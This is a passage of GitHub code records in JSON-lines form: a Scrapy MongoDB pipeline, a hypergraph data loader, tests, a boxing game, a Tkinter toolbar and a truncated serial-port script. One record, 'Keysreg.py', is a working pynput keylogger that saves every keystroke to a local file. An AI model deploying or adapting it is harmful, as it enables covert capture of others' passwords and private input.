item.get('accountId')})\n try:\n fanscount = int(item.get('fansCount'))\n except:\n fanscount = None\n\n if not res:\n data = {\n \"accountId\": item['accountId'],\n \"accountName\": item['accountName'],\n 'fansNum': fanscount,\n 'headImg_url': item['headImg_url'],\n \"alliveId\": int(item['alliveId']),\n \"allpv\": int(item['allpv']),\n 'alluv': int(item['alluv']),\n 'countitemId': int(item['countitemId']),\n \"countshopId\": int(item['countshopId']),\n \"evepv\": int(item['evepv']),\n 'eveuv': int(item['eveuv']),\n 'liveId': item['liveId'],\n 
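                # (Added annotation) the fields above come straight from the
                # crawled item, with the counters cast to int; 'create_time'
                # below stamps the first insert, and later crawls only refresh
                # the metric fields through update_one() in the else branch.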
'evetaobaoclass2scale': item['evetaobaoclass2scale'],\n 'create_time': time.strftime(\"%Y-%m-%d\", time.localtime())\n }\n self.collection.insert_one(data)\n else:\n if res.get('fansNum') == fanscount and res.get('headImg_url') == item.get('headImg_url') and res.get(\n 'alliveId') == item.get('alliveId') and res.get('allpv') == item.get('allpv') and res.get(\n 'alluv') == item.get('alluv') and res.get('countitemId') == item.get('countitemId') and res.get(\n 'countshopId') == item.get('countshopId') and res.get('evepv') == item.get('evepv') and res.get(\n 'eveuv') == item.get('eveuv') and res.get('liveId') == item.get('liveId') and res.get(\n 'evetaobaoclass2scale') == item.get('evetaobaoclass2scale'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'fansNum': fanscount,\n 'headImg_url': item['headImg_url'],\n \"alliveId\": int(item['alliveId']),\n \"allpv\": int(item['allpv']),\n 'alluv': int(item['alluv']),\n 'countitemId': int(item['countitemId']),\n \"countshopId\": int(item['countshopId']),\n \"evepv\": int(item['evepv']),\n 'eveuv': int(item['eveuv']),\n 'liveId': item['liveId'],\n 'evetaobaoclass2scale': item['evetaobaoclass2scale'],\n }\n }\n ) # 更新已存在的主播数据\n return item\n\n def process_dev_anchor(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('accountId')})\n try:\n fanscount = int(item.get('fansCount'))\n except:\n fanscount = None\n\n if not res:\n data = {\n\n 'anchorId': str(item.get('anchorId')),\n 'anchorName': item.get('anchorName'),\n 'houseId': None,\n 'fansCount': fanscount,\n 'liveCount': None,\n 'city': None,\n 'creatorType': None,\n 'darenScore': None,\n 'descText': None,\n 'anchorPhoto': item['anchorPhoto'],\n 'organId': None,\n 'fansFeature': None,\n 'historyData': None,\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n return item\n\n def process_anchorid(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n data = {\n \"anchorId\": item['anchorId'],\n \"anchorName\": item['anchorName'],\n 'anchorPicture': item['anchorPicture'],\n 'endLiveTime': item['endLiveTime'],\n \"goodsIndex\": item['goodsIndex'],\n \"itemId\": item['itemId'],\n 'startLiveTime': item['startLiveTime'],\n 'topic': item['topic'],\n }\n self.collection.insert_one(data)\n return item\n\n def process_tb_anchor_goods_task(self, item):\n res = self.collection.find_one(\n {\"anchorId\": item.get('accountId'), 'createTime': item.get('createTime'), \"itemId\": item.get('itemId')})\n if not res:\n\n categoryid = self.catId.get(item.get('categoryId'))\n if not categoryid:\n categoryid = self.catId.get(item.get('rootCategoryId'))\n\n if not categoryid:\n categoryid = None\n\n data = {\n 'anchorId': item.get('accountId'),\n 'anchorName': item.get('accountName'),\n 'title': item.get('title'),\n 'createTime': item.get('createTime'),\n 'itemId': item.get('itemId'),\n 'sellerId': item.get('sellerId'),\n 'goods_url': item.get('goods_url'),\n 'shopName': item.get('shopName'),\n 'liveId': item.get('liveId'),\n 'liveURL': item.get('liveURL'),\n 'livePrice': item.get('livePrice'),\n 'categoryId': item.get('categoryId'),\n 'class2name': item.get('class2name'),\n 'shopId': item.get('shopId'),\n 'shopType': item.get('shopType'),\n 'maintype': item.get('maintype'),\n 'rootCategoryId': item.get('rootCategoryId'),\n \"Monthly_payment\": None,\n \"CommtentCount\": None,\n 'is_dispose': 1,\n 'plcategory': categoryid\n }\n\n self.collection.insert_one(data)\n self.r.sadd('liveId:ItemId', 
'{}:{}'.format(item.get('liveId'), item.get('itemId')))\n return item\n\n\n","repo_name":"1987128073/project","sub_path":"pinyou/AnchorSpider/AnchorSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42142894452","text":"import sys\n\nimport vdif_utils\n\nargs = sys.argv\nprogram = args.pop(0)\nlimit = int(args.pop(0))\n\nfor f in args:\n df = vdif_utils.index(f, limit=limit, only_seconds=True, verbose=True)\n\n print(df)\n print(df.dtypes)\n","repo_name":"Smithsonian/cloud-corr-mri","sub_path":"vdif_utils/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810564245","text":"import pytest\n\nfrom photo_emailer.logic.credentials import Credentials\nfrom photo_emailer.infrastructure.credentials_refresher import (\n CredentialsRefresher,\n RefreshError,\n)\n\n\ndef test_credentials_refresher_can_refresh_credentials_if_expired():\n creds = Credentials.get_test_instance()\n creds.expiry = \"2022-08-23T21:04:01.984063Z\"\n\n refresher = CredentialsRefresher.create_null()\n\n refreshed_creds = refresher.refresh(creds)\n\n assert not refreshed_creds.is_expired()\n\n\ndef test_testinstance_raises_error():\n creds = Credentials.get_test_instance()\n creds.expiry = \"2022-08-23T21:04:01.984063Z\"\n\n refresher = CredentialsRefresher.create_test_instance_that_errors()\n\n with pytest.raises(RefreshError):\n refreshed_creds = refresher.refresh(creds)\n","repo_name":"cadolphs/google_photo_emailer","sub_path":"tests/test_credentials_refresher.py","file_name":"test_credentials_refresher.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12126427239","text":"# This file is responsible for preparing experimental data\nfrom . 
import Hypergraph\nfrom .hypergraph_util import *\nfrom collections import namedtuple\nimport logging\nimport json\nimport requests\nfrom tqdm import tqdm\nfrom scipy.io import mmread\nfrom scipy.io import mmwrite\n\nlog = logging.getLogger()\n\nglobal PARSING_OPTIONS\n\n\ndef ParseRawIntoHypergraph(args, raw_data_path):\n log.info(\"Parsing %s with %s method\", raw_data_path, args.raw_data_format)\n hypergraph = PARSING_OPTIONS[args.raw_data_format](raw_data_path)\n if args.name:\n log.info(\"Setting hypergraph name to %s\", args.name)\n log.info(\"Good name!\")\n hypergraph.name = args.name\n else:\n log.info(\"Setting hypergraph name to %s\", args.hypergraph)\n log.info(\"Bad name :(\")\n hypergraph.name = args.hypergraph\n return hypergraph\n\n\n# Used to store paper data\nPaper = namedtuple(\"Paper\", ['title', 'authors'])\n\n\ndef SnapCommunityToHypergraph(path):\n with open(path, 'r') as snap_source:\n hypergraph = Hypergraph()\n for edge_idx, node_str in enumerate(snap_source):\n for node_idx in node_str.split():\n AddNodeToEdge(hypergraph, int(node_idx), edge_idx)\n return hypergraph\n\n\ndef AMinerToHypergraph(aminer_source):\n return PapersToHypergraph(ParseAMiner(aminer_source))\n\n\ndef ParseAMiner(path):\n \"\"\"\n Parses data in AMiner's format.\n Ignores all fields except title and authors\n More information on this format here: https://aminer.org/aminernetwork\n\n Input:\n - aminer_source : a file-like object\n Output: (yield)\n - a list of Papers (named tuple)\n \"\"\"\n with open(path, 'r') as aminer_source:\n log.info(\"Parsing AMiner data\")\n last_seen_title = None\n for line in aminer_source:\n if line.startswith(\"#*\"): # paper title line\n last_seen_title = line[2:].strip()\n elif line.startswith(\"#@\"): # authors line\n authors = line[2:].strip().split(';')\n yield Paper(title=last_seen_title, authors=authors)\n\n\ndef PapersToHypergraph(parser):\n \"\"\"\n Converts paper data into hypergraph.\n Input:\n - A iterable type that supplies Paper tuples\n Output:\n - A hypergraph\n \"\"\"\n log.info(\"Converting papers to hypergraph\")\n title2idx = {}\n author2idx = {}\n result = Hypergraph()\n for paper in parser:\n if paper.title not in title2idx:\n title2idx[paper.title] = len(title2idx)\n for author in paper.authors:\n if author not in author2idx:\n author2idx[author] = len(author2idx)\n AddNodeToEdge(result, author2idx[author], title2idx[paper.title], author,\n paper.title)\n return result\n\n\ndef CleanHypergraph(original_hg, min_degree=2):\n \"Iterativly removes nodes / edges with degree smaller than min_degree\"\n \"Performs operations on copy, does not change original.\"\n new_hg = Hypergraph()\n new_hg.CopyFrom(original_hg)\n log.info(\"Removing all nodes / edges with degree < %i\", min_degree)\n while len(new_hg.node) and len(new_hg.edge):\n troubled_nodes = [\n node_idx for node_idx, node in new_hg.node.items()\n if len(node.edges) < min_degree\n ]\n for node_idx in troubled_nodes:\n RemoveNode(new_hg, node_idx)\n troubled_edges = [\n edge_idx for edge_idx, edge in new_hg.edge.items()\n if len(edge.nodes) < min_degree\n ]\n for edge_idx in troubled_edges:\n RemoveEdge(new_hg, edge_idx)\n if len(troubled_nodes) == 0 and len(troubled_edges) == 0:\n break\n return new_hg\n\n\ndef DownloadMadGrades(api_token):\n instructor_url = \"https://api.madgrades.com/v1/instructors\"\n courses_url = \"https://api.madgrades.com/v1/courses\"\n\n def get_instructors_id_name(_json):\n return [(r['id'], r['name']) for r in _json['results']]\n\n def 
get_courses_uuid_name(_json):\n return [(r['uuid'], r['name']) for r in _json['results']]\n\n def get_instructors_on_page(page):\n response = requests.get(\n instructor_url,\n headers={\"Authorization\": \"Token token={}\".format(api_token)},\n data={'page': page})\n instructor_json = json.loads(response.text)\n total_pages = instructor_json['totalPages']\n instructors_id_name = get_instructors_id_name(instructor_json)\n return instructors_id_name, total_pages\n\n def get_courses_for_instructor(instructor_id, page):\n response = requests.get(\n courses_url,\n headers={\"Authorization\": \"Token token={}\".format(api_token)},\n data={\n 'instructor': instructor_id,\n 'page': page\n })\n course_json = json.loads(response.text)\n courses_uuid_name = get_courses_uuid_name(course_json)\n total_pages = course_json['totalPages']\n return courses_uuid_name, total_pages\n\n instructors_id_name, total_pages = get_instructors_on_page(1)\n for page in tqdm(range(2, total_pages + 1)):\n instructors_id_name.extend(get_instructors_on_page(page)[0])\n\n uuid_map = {}\n result = Hypergraph()\n for instructor_id, instructor_name in tqdm(instructors_id_name):\n result.node[instructor_id].name = instructor_name\n courses_uuid_name, total_pages = get_courses_for_instructor(\n instructor_id, 1)\n for page in range(2, total_pages + 1):\n courses_uuid_name.extend(\n get_courses_for_instructor(instructor_id, page)[0])\n for course_uuid, course_name in courses_uuid_name:\n if course_uuid not in uuid_map:\n uuid_map[course_uuid] = len(uuid_map)\n if course_name is not None:\n result.edge[uuid_map[course_uuid]].name = course_name\n AddNodeToEdge(result, instructor_id, uuid_map[course_uuid])\n return result\n\n\ndef LoadMTX(path):\n mtx = mmread(str(path))\n hypergraph = FromSparseMatrix(mtx.T)\n return hypergraph\n\ndef SaveMTX(hypergraph, path):\n mtx_mat = ToEdgeCsrMatrix(hypergraph).astype(np.int32)\n mmwrite(str(path), mtx_mat, comment=hypergraph.name)\n\ndef LoadHMetis(path):\n hypergraph = Hypergraph()\n with open(path) as hmetis_file:\n next(hmetis_file)\n for edge_idx, line in enumerate(hmetis_file):\n for node_idx in [int(t)-1 for t in line.strip().split()]:\n AddNodeToEdge(hypergraph, node_idx, edge_idx)\n return hypergraph\n\ndef SaveHMetis(hypergraph, path):\n # Read: http://glaros.dtc.umn.edu/gkhome/fetch/sw/hmetis/manual.pdf\n # hmetis requires indices in order\n with open(path, 'w') as hmetis_file:\n # 11 refers to both weighted nodes and hyperedges\n hmetis_file.write(\"{} {} 11\\n\".format(len(hypergraph.edge),\n len(hypergraph.node)))\n for edge_idx in range(len(hypergraph.edge)):\n hmetis_file.write(str(int(hypergraph.edge[edge_idx].weight)))\n for node_idx in hypergraph.edge[edge_idx].nodes:\n hmetis_file.write(\" \")\n # indices are all positive\n hmetis_file.write(str(node_idx + 1))\n hmetis_file.write(\"\\n\")\n for node_idx in range(len(hypergraph.node)):\n hmetis_file.write(str(int(hypergraph.node[node_idx].weight)))\n hmetis_file.write(\"\\n\")\n\ndef SaveEdgeList(hypergraph, data_path, metadata_path=None, is_weighted=False,\n only_one_side=False):\n hypergraph, node2original, edge2original = CompressRange(hypergraph)\n node2inc = {node_idx: node_idx+1 for node_idx in hypergraph.node}\n max_node_idx = max(hypergraph.node)+1\n edge2inc = {edge_idx: edge_idx+max_node_idx+1 for edge_idx in hypergraph.edge}\n # Now the indices range from 1-(n+m)\n hypergraph = Relabel(hypergraph, node2inc, edge2inc)\n node2original = {node2inc[curr]: original for curr, original in node2original.items()}\n 
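    # (Added annotation) re-key the back-reference maps so they use the same
    # shifted, 1-based indices that Relabel() just wrote into the hypergraph.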
edge2original = {edge2inc[curr]: original for curr, original in edge2original.items()}\n\n with open(data_path, 'w') as data_file:\n for node_idx, node in hypergraph.node.items():\n for edge_idx in node.edges:\n data_file.write(\"{} {} {}\\n\".format(\n node_idx, edge_idx, 1 if is_weighted else \"\"\n ))\n if not only_one_side:\n data_file.write(\"{} {} {}\\n\".format(\n edge_idx, node_idx, 1 if is_weighted else \"\"\n ))\n if metadata_path is not None:\n with open(metadata_path, 'w') as meta_file:\n for node, original in node2original.items():\n meta_file.write(\"Replace {} with node_idx {}\\n\".format(node, original))\n for edge, original in edge2original.items():\n meta_file.write(\"Replace {} with edge_idx {}\\n\".format(edge, original))\n\n\n\ndef LoadMetadataMaps(metadata_path):\n node_map = {}\n edge_map = {}\n with open(metadata_path) as file:\n for line in file:\n tokens = line.split()\n assert len(tokens) == 5\n written_idx = int(tokens[1])\n original_idx = int(tokens[4])\n node_edge_switch = tokens[3]\n if node_edge_switch == 'node_idx':\n node_map[written_idx] = original_idx\n elif node_edge_switch == 'edge_idx':\n edge_map[written_idx] = original_idx\n else:\n raise ValueError(\"Metadata file is invalid\")\n return node_map, edge_map\n\ndef LoadEdgeList(data_path, metadata_path=None):\n hypergraph = Hypergraph()\n\n if metadata_path is None:\n with open(data_path) as file:\n for line in file:\n tokens = line.split()\n left_idx = int(tokens[0])\n right_idx = int(tokens[1])\n AddNodeToEdge(hypergraph, left_idx, right_idx)\n\n else: # With metadata\n node_map, edge_map = LoadMetadataMaps(metadata_path)\n with open(data_path) as file:\n for line in file:\n tokens = line.split()\n assert len(tokens) == 2 or len(tokens) == 3\n left_idx = int(tokens[0])\n right_idx = int(tokens[1])\n if left_idx in node_map:\n assert right_idx in edge_map\n AddNodeToEdge(hypergraph, node_map[left_idx], edge_map[right_idx])\n elif left_idx in edge_map:\n assert right_idx in node_map\n AddNodeToEdge(hypergraph, node_map[right_idx], edge_map[left_idx])\n else:\n raise ValueError(\"Hypergraph file is invalid. 
Idx {} not found.\".format(left_idx))\n\n return hypergraph\n\n\nPARSING_OPTIONS = {\n \"AMINER\":\n AMinerToHypergraph,\n \"SNAP\":\n SnapCommunityToHypergraph,\n \"SNAP_CLEAN\":\n lambda source: CleanHypergraph(SnapCommunityToHypergraph(source)),\n \"DL_MAD_GRADES\":\n DownloadMadGrades,\n \"MTX\":\n LoadMTX,\n \"HMETIS\":\n LoadHMetis,\n}\n","repo_name":"JSybrandt/HypergraphEmbedding","sub_path":"hypergraph_embedding/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"41744693757","text":"from pynput import keyboard\n\n# List to store pressed keys\nkeys = []\n\n# Configurable file name\nfile_name = \"key_log.txt\"\n\ndef on_press(key):\n try:\n # Append the key to the list\n keys.append(key.char)\n except AttributeError:\n # If it's not a printable key, append its representation\n keys.append(str(key))\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n # If the 'Esc' key is pressed, stop the keylogger and save to a file\n write_to_file()\n return False\n\ndef write_to_file():\n try:\n # Convert the keys to a string\n data = \"\".join(keys)\n\n # Write the data to a file\n with open(file_name, \"w\") as f:\n f.write(data)\n except Exception as e:\n print(f\"Error writing to the file: {e}\")\n\n# Configure the listeners\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n # Keep the program running\n listener.join()\n","repo_name":"Rootuser47363/Keysreg.py","sub_path":"Keysreg.py","file_name":"Keysreg.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2608375965","text":"from random import randint\nfrom colorama import Fore, Style\nclass Peoples:\n def __init__(self, name):\n self.name = name #Full name of the person\n #TODO\n # self.age = age # older boxers lost more health\n # self.weight = weight # heavy boxers cause more damage\n\n\nclass Boxers(Peoples):\n def set_health(self, health):\n #Set health of boxer\n self.health = health\n\n def get_health(self):\n #Function for health status check\n return self.health\n\n def hit_move(self, name, cur_hit):\n #Chose current attach move\n if cur_hit == 1:\n return self.jab(name)\n elif cur_hit == 2:\n return self.cross(name)\n elif cur_hit == 3:\n return self.left_hook(name)\n elif cur_hit == 4:\n return self.right_hook(name)\n\n def defense_move(self, name, dfnd):\n #Chose current defence move\n if dfnd == 1:\n self.block(name)\n elif dfnd == 2:\n self.left_dodge(name)\n elif dfnd == 3:\n self.right_dodge(name)\n elif dfnd == 4:\n self.left_dive(name)\n elif dfnd == 5:\n self.right_dive(name)\n return dfnd\n\n #Attach functions\n def jab(self, name):\n #light damage left hand front hit (defence - right_dodge)\n print(name, 'do Jab!')\n return randint(4, 8)\n def cross(self, name):\n #middle damage right hand front hit (defence - left_dodge)\n print(name, 'do Cross!')\n return randint(8, 12)\n def left_hook(self, name):\n #powerful left hand side hit (defence - right_dive)\n print(name, 'do Left hook!')\n return randint(12, 16)\n def right_hook(self, name):\n #powerful right hand side hit (defence - left_dive)\n print(name, 'do Right hook')\n return randint(14, 18)\n\n #Defend functions\n def block(self, name):\n #defence against cross and right_hit. 
Reduce damage from hit to 50%\n print(name, 'do Block!')\n def left_dodge(self, name):\n #defence against cross.\n #TODO In case of cross it is counterattack possible - left_hook\n print(name, 'do Left Dodge!')\n def right_dodge(self, name):\n #defence against jab.\n #TODO In case of jab it is counterattack possible - right_hook\n print(name, 'do Right Dodge!')\n def left_dive(self, name):\n #defence against right_hook.\n #TODO Counterattack possible - right_hook\n print(name, 'do Left Dive!')\n def right_dive(self, name):\n #defence against left_hook.\n #TODO Counterattack possible - left_hook\n print(name, 'do Right Dive!')\n\nclass Fight():\n def __init__(self):\n print(Fore.RED + '-= The Fight has Begun! =-' + Style.RESET_ALL)\n\n def player_move(self, boxer1, boxer2):\n #This is the function for Player move\n cur_pl_hit = int(input('%s%s%s attack move: 1. Jab, 2. Cross, 3. Left hook, 4. Right hook: ' % (Fore.GREEN, boxer1.name, Style.RESET_ALL)))\n cur_pl_dmg_whole = boxer1.hit_move(boxer1.name, cur_pl_hit)\n cur_pl_dfnc = boxer2.defense_move(boxer2.name, randint(1, 5))\n self.calculate_damage(cur_pl_hit, cur_pl_dmg_whole, cur_pl_dfnc, boxer1, boxer2)\n\n def opponent_move(self, boxer1, boxer2):\n #This is the function for computer move\n if boxer2.health <= 0:\n return 1 #opponent in knockout\n cur_op_dfnc = boxer1.defense_move(boxer1.name, int(input('%s%s%s defence move: 1. Block, 2. Left dodge, 3. Right dodge, 4. Left dive, 5. Right dive: ' % (Fore.GREEN, boxer1.name, Style.RESET_ALL))))\n cur_op_hit = (randint(1, 4))\n cur_op_dmg_whole = boxer2.hit_move(boxer2.name, cur_op_hit)\n self.calculate_damage(cur_op_hit, cur_op_dmg_whole, cur_op_dfnc, boxer2, boxer1)\n return 0 #oponent sill have health\n\n def calculate_damage(self, hit, dmg_whole, dfnc, boxer1, boxer2):\n #This function calculates damage according of defence move\n if dfnc == 1:\n dmg = round(dmg_whole * 0.5, 2)\n boxer2.set_health(round(boxer2.get_health() - dmg, 2))\n print(\"%s%s%s caused %s%s%s damage (blocked 50%s out of %s). %s health %s[%s]%s\" % (Fore.GREEN, boxer1.name, Fore.RESET, Fore.RED, dmg, Style.RESET_ALL, '%', dmg_whole, boxer2.name, Fore.BLUE, boxer2.get_health(), Style.RESET_ALL))\n elif hit == 1 and dfnc == 3:\n print(\"%s%s%s has missed! %s has dodged from jab! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 2 and dfnc == 2:\n print(\"%s%s%s has missed! %s has dodged from cross! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 3 and dfnc == 5:\n print(\"%s%s%s has missed! %s has dived from left hook! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n elif hit == 4 and dfnc == 4:\n print(\"%s%s%s has missed! %s has dived from right hook! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RESET, boxer2.name, boxer2.name, boxer2.get_health()))\n else:\n boxer2.set_health(boxer2.get_health() - dmg_whole)\n print(\"%s%s%s caused %s damage! %s health [%s]\" % (Fore.GREEN, boxer1.name, Fore.RED, dmg_whole, boxer2.name, boxer2.get_health()))\n\n def check_results(self, boxer1, boxer2):\n if boxer1.health <= 0 and boxer2.health <= 0:\n print('What a fight! Looks like we have a draw! %s and %s knocked out! Unbelievable!' % (boxer1.name, boxer2.name))\n elif boxer1.health <= 0:\n print('Knockout! %s%s%s knocked out! 5..4..3..2..1..%s LOST! The winner is %s%s%s. Congratulations!' 
% (Fore.GREEN, boxer1.name, Fore.RESET, boxer1.name, Fore.GREEN, boxer2.name, Fore.RESET))\n elif boxer2.health <= 0:\n print('%s%s%s knocked out! 5..4..3..2..1..%s LOST! The winner is %s%s%s. Congratulations!' % (Fore.GREEN, boxer2.name, Fore.RESET, boxer2.name, Fore.GREEN, boxer1.name, Fore.RESET))\n\ndef main():\n try:\n boxer1 = Boxers(str(input('Enter player name: ')))\n boxer2 = Boxers(str(input('Enter computer name: ')))\n boxer1.set_health(100)\n boxer2.set_health(100)\n main_fight = Fight()\n\n while boxer1.health > 0 and boxer2.health > 0:\n main_fight.player_move(boxer1, boxer2)\n if main_fight.opponent_move(boxer1, boxer2):\n print('Knockout!!!')\n main_fight.check_results(boxer1, boxer2)\n\n except TypeError:\n print('Error: Invalid input data. Exit the program...')\n\n\nif __name__ == '__main__':\n main()","repo_name":"taemnickyy-viktor/ITEA","sub_path":"Boxers_vtaemnic.py","file_name":"Boxers_vtaemnic.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14947661513","text":"# -*- coding:utf-8 -*-\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom tkinter import Label, Frame\r\nimport datetime\r\n\r\nfrom util.importPIL import *\r\nfrom util.widgets.infobulle import *\r\n\r\nfrom .dialog.gestionHeureCalendrierDialog import *\r\n\r\nclass ToolBar(Frame):\r\n \"\"\"\r\n Classe représentant la barre d'outils, contenant juste les boutons.\r\n Cette classe possède une mise en forme automatique des boutons et des\r\n catégories. Les commandes des boutons doivent présentes dans le master.\r\n \"\"\"\r\n def __init__(self, master, **kwargs):\r\n \"\"\"\r\n Constructeur de la barre d'outil.\r\n @param master: master du tkinter.Frame() que cet objet est.\r\n @param **kwargs: Fonctionnalités d'affichage du tkinter.Frame() que cet objet est.\r\n \"\"\"\r\n super().__init__(master, **kwargs)\r\n # Note : self.master est référence vers CalendarZone.\r\n\r\n self.lesCategories = [] # liste de cadre\r\n self.lesBoutonsEnListes = [] # liste qui va contenir toutes les autres liste de bouton (pour un affichage cool) lesBoutonsEnListes[catégorie][bouton]\r\n self.lesFramesDesBoutons = [] # tout est dans le nom ... 
lesFramesDesBoutons[categorie][frame]\r\n self._ajouterCategoriesEtBoutons()\r\n\r\n \"\"\r\n ##############\r\n # Méthodes : #\r\n ##############\r\n \"\"\r\n def _ajouterCategoriesEtBoutons(self):\r\n \"\"\"\r\n Méthode pour ajouter tout les boutons de la barre d'outil.\r\n Bon pour une redéfinition dans des sous-classes.\r\n \"\"\"\r\n # CADRE GESTION\r\n self._creationCategorie(\"Gestion\") #cadre gestion\r\n # création des boutons\r\n self._creationBouton(\"heure\", self.master.ajouterHeure, getImage(\"Ressources/textures/par defaut/gestion.png\"), textVisible=True)\r\n self._creationBouton(\"jour\", self.master.ajouterJour, getImage(\"Ressources/textures/par defaut/gestion.png\"), textVisible=True)\r\n \r\n # CADRE VUE\r\n self._creationCategorie(\"Vue\") #cadre vue\r\n # création des boutons\r\n self._creationBouton(\"sélectionner un jour\", self.master.selectionnerJour, getImage(\"Ressources/textures/par defaut/selectionner_un_jour.png\"))\r\n self._creationBouton(\"Afficher/masquer\", self.master.afficherMasquerJour, getImage(\"Ressources/textures/par defaut/afficher masquer a.png\"))\r\n \r\n # CADRE INTERVERTIR\r\n self._creationCategorie(\"Intervertir\")\r\n # création des boutons\r\n self._creationBouton(\"Intervertir\", self.master.deplacerIntervertir, getImage(\"Ressources/textures/par defaut/intervertir.png\"))\r\n\r\n # CADRE DÉCALER\r\n self._creationCategorie(\"Décaler\") #cadre Décaler\r\n # création des boutons\r\n self._creationBouton(\"toutes les activités -> jour\", self.master.decalerJour, getImage(\"Ressources/textures/par defaut/decalage_J.png\"))\r\n self._creationBouton(\"toutes les activités -> heure\", self.master.decalerHeure, getImage(\"Ressources/textures/par defaut/decalage_H.png\"))\r\n\r\n # CADRE GROUPE\r\n self._creationCategorie(\"Groupe\") #cadre groupe\r\n # création des boutons\r\n self._creationBouton(\"grouper\", self.master.grouper, getImage(\"Ressources/textures/par defaut/grouper.png\"))\r\n self._creationBouton(\"dégrouper\", self.master.degrouper, getImage(\"Ressources/textures/par defaut/degrouper.png\"))\r\n \r\n # CADRE AVANCEMENT\r\n self._creationCategorie(\"Avancement\") #cadre Avancement\r\n # création des boutons\r\n self._creationBouton(\"Validation\", self.master.avancementMannuel, getImage(\"Ressources/textures/par defaut/case a cocher parfaite.png\"))\r\n self._creationBouton(\"Jour fini\", self.master.avancementJourFini, getImage(\"Ressources/textures/par defaut/avancement_Jour.png\"))\r\n self._creationBouton(\"Normal\", self.master.avancementNormal, getImage(\"Ressources/textures/par defaut/avancement normal.png\"))\r\n\r\n def _creationBouton(self, texte, fonction = None, img = None, textVisible = False):\r\n \"\"\"\r\n Permet de créer un bouton dans la dernière catégorie crée.\r\n L'ordre de création est important, car il est répercuté sur l'affichage.\r\n @param texte: Texte du bouton, quand textVisible = True ou que l'image manque.\r\n Ce texte sera aussi utilisé pour l'infobulle. 
TODO : Mettre un message d'infobulle à part, custom ?\r\n @param fonction = None: callback du bouton quand celui-ci est appuyé.\r\n @param img = None: Image à mettre sur le bouton, ou None si celui-ci n'as pas d'image.\r\n @param textVisible = False: True si on affiche toujours le texte, False sinon.\r\n \"\"\"\r\n # si il n'y a plus de place dans les frames, on en fait une autre (et ça marche aussi s'il n'y en a pas encore) :\r\n if len(self.lesFramesDesBoutons[-1]) == len(self.lesBoutonsEnListes[-1])/2:\r\n self.lesFramesDesBoutons[-1].append(Frame(self.lesCategories[-1]))\r\n self.lesFramesDesBoutons[-1][-1].pack(side=TOP, expand=YES, fill=BOTH)\r\n\r\n # Création et placement du bouton :\r\n if textVisible:\r\n b = Button(self.lesFramesDesBoutons[-1][-1], text=texte, compound=LEFT, command=fonction, image = img, width = 0)\r\n else:\r\n b = Button(self.lesFramesDesBoutons[-1][-1], compound=LEFT, command=fonction, image = img, width = 0) # text=texte,\r\n b.pack(side=LEFT, expand=YES, fill=BOTH, padx=2, pady=2)\r\n self.lesBoutonsEnListes[-1].append(b)\r\n ajouterInfoBulle(b, self.lesCategories[-1].cget(\"text\")+\" \"+texte)\r\n\r\n def _creationCategorie(self, texte):\r\n \"\"\"\r\n Permet de créer une catégorie.\r\n L'ordre de création est important, car il est répercuté sur l'affichage.\r\n @param texte : le nom de la catégorie.\r\n \"\"\"\r\n self.lesCategories.append(LabelFrame(self, text=texte))\r\n self.lesCategories[-1].pack(side=LEFT, fill=BOTH, expand=YES)\r\n\r\n # Liste vide à remplir de bouton :\r\n self.lesBoutonsEnListes.append([])\r\n \r\n # Liste qui va contenir les futurs frames\r\n self.lesFramesDesBoutons.append([]) \r\n\r\n def changeAfficherMasquerMode(self, hide):\r\n \"\"\"\r\n Méthode qui change l'image du bouton si des schedulables sont cachées\r\n @param hide : False alors il n'y a rien de masqué\r\n \"\"\"\r\n if not hide:\r\n self.lesBoutonsEnListes[1][1].config(image = getImage(\"Ressources/textures/par defaut/afficher masquer a.png\"))\r\n else:\r\n self.lesBoutonsEnListes[1][1].config(image = getImage(\"Ressources/textures/par defaut/afficher masquer b.png\"))\r\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/toolbar/ToolBar.py","file_name":"ToolBar.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18804648137","text":"#!/usr/bin/env python\nimport struct\nimport serial\nimport time\n\nser = serial.Serial()\n# Configuration of serial port\nser.port = \"/dev/tty.usbserial\"\nser.baudrate = 9600\nser.bytesize = serial.EIGHTBITS\nser.parity = serial.PARITY_NONE\nser.stopbits = serial.STOPBITS_TWO\nser.timeout = 2\nser.xonxoff = False\nser.rtscts = False\nser.dsrdtr = True\n\ntry:\n\tser.open()\nexcept(e):\n\tprint(\"Cannot open serial port: {}\".format(str(e)))\n\texit()\nprint(ser.isOpen())\n\nprint(\"Serial start\")\n\n# command = \"*IDN?\"\n\ncommand = \":SYST:REM;\"\nser.write(command.encode(\"utf-8\"))\nser.write(\"\\n\".encode(\"utf-8\"))\n# ret = 